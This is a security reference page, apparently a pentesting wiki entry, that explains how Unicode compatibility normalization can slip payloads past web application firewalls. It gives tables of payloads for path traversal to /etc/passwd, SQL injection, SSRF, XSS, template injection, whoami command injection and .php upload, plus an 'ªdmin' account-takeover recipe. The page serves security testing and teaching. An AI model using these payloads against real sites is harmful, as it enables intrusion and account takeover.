# WAF Bypassing with Unicode Compatibility

[**https://jlajara.gitlab.io/Bypass\_WAF\_Unicode**](https://jlajara.gitlab.io/Bypass_WAF_Unicode)

**Unicode Compatibility** is a form of *Unicode Equivalence* which ensures that between characters or sequences of characters which may have distinct visual appearances or behaviors, the same abstract character is represented. For example, `𝕃` is normalized to `L`. This behaviour could open the door to abuse some weak implementations that *performs unicode compatibility after the input is sanitized*.

### How to find normalized characters? <a href="#how-to-find-normalized-characters" id="how-to-find-normalized-characters"></a>

In order to find a complete list of characters that have the same meaning after unicode compatibility this amazing resource could be used:

* <https://www.compart.com/en/unicode>

A character can be searched and the same character after compatibility would be found. For example, the character `<` - <https://www.compart.com/en/unicode/U+003C>

![Compart](https://jlajara.gitlab.io/assets/images/posts/20200219/3.png)

Shows this three characters: `≮`,`﹤` and `＜`. After clicking in each one we can see in the *Decomposition* section that are normalized in the following way:

* `≮` - `<` (U+003C) - `◌̸` (U+0338)
* `﹤` - `<` (U+003C)
* `＜` - `<` (U+003C)

In this case the character `≮` would not achieve our desired functionallity because it injects the character `◌̸` (U+0338) and will break our payload.

### Exploiting other vulnerabilities <a href="#exploiting-other-vulnerabilities" id="exploiting-other-vulnerabilities"></a>

Tons of custom payloads could be crafted if normalization is performed, in this case I will give some ideas:

* **Path Traversal**

| Character  | Payload          | After Normalization |
| ---------- | ---------------- | ------------------- |
| ‥ (U+2025) | ‥/‥/‥/etc/passwd | ../../../etc/passwd |
| ︰(U+FE30)  | ︰/︰/︰/etc/passwd | ../../../etc/passwd |

* **SQL Injection**

| Character  | Payload     | After Normalization |
| ---------- | ----------- | ------------------- |
| ＇(U+FF07)  | ＇ or ＇1＇=＇1 | ’ or ‘1’=’1         |
| ＂(U+FF02)  | ＂ or ＂1＂=＂1 | ” or “1”=”1         |
| ﹣ (U+FE63) | admin＇﹣﹣    | admin’–             |

* **Server Side Request Forgery (SSRF)**

| Character  | Payload   | After Normalization |
| ---------- | --------- | ------------------- |
| ⓪ (U+24EA) | ①②⑦.⓪.⓪.① | 127.0.0.1           |

* **Open Redirect**

| Character | Payload             | After Normalization |
| --------- | ------------------- | ------------------- |
| 。(U+3002) | jlajara。gitlab。io   | jlajara.gitlab.io   |
| ／(U+FF0F) | ／／jlajara.gitlab.io | //jlajara.gitlab.io |

* **XSS**

| Character | Payload              | After Normalization  |
| --------- | -------------------- | -------------------- |
| ＜(U+FF1C) | ＜script src=a／＞      | ＜script src=a/>      |
| ＂(U+FF02) | ＂onclick=＇prompt(1)＇ | “onclick=’prompt(1)’ |

* **Template Injection**

| Character  | Payload | After Normalization |
| ---------- | ------- | ------------------- |
| ﹛(U+FE5B)  | ﹛﹛3+3﹜﹜ | {{3+3}}             |
| ［ (U+FF3B) | ［［5+5］］ | \[\[5+5]]           |

* **OS Command Injection**

| Character  | Payload   | After Normalization |
| ---------- | --------- | ------------------- |
| ＆ (U+FF06) | ＆＆whoami  | &\&whoami           |
| ｜ (U+FF5C) | ｜｜ whoami | \|\|whoami          |

* **Arbitrary file upload**

| Character             | Payload  | After Normalization |
| --------------------- | -------- | ------------------- |
| ｐ (U+FF50) ʰ (U+02B0) | test.ｐʰｐ | test.php            |

* **Business logic**

Register a user with some characters similar to another user. Maybe the registration process will allow the registration because the user in this step is not normalized and allows this character. After that, suppose that the application performs some normalization after retrieving the user data.

* **1.** Register `ªdmin`. There is not entry in database, registration successfull.
* **2.** Login as `ªdmin`. Backend performs normalization and gives the results of `admin`.
* **3.** Account takeover.

| Character  | Payload | After Normalization |
| ---------- | ------- | ------------------- |
| ª (U+00AA) | ªdmin   | admin               |

Referencia:

{% embed url="<https://jlajara.gitlab.io/web/2020/02/19/Bypass_WAF_Unicode.html>" %}
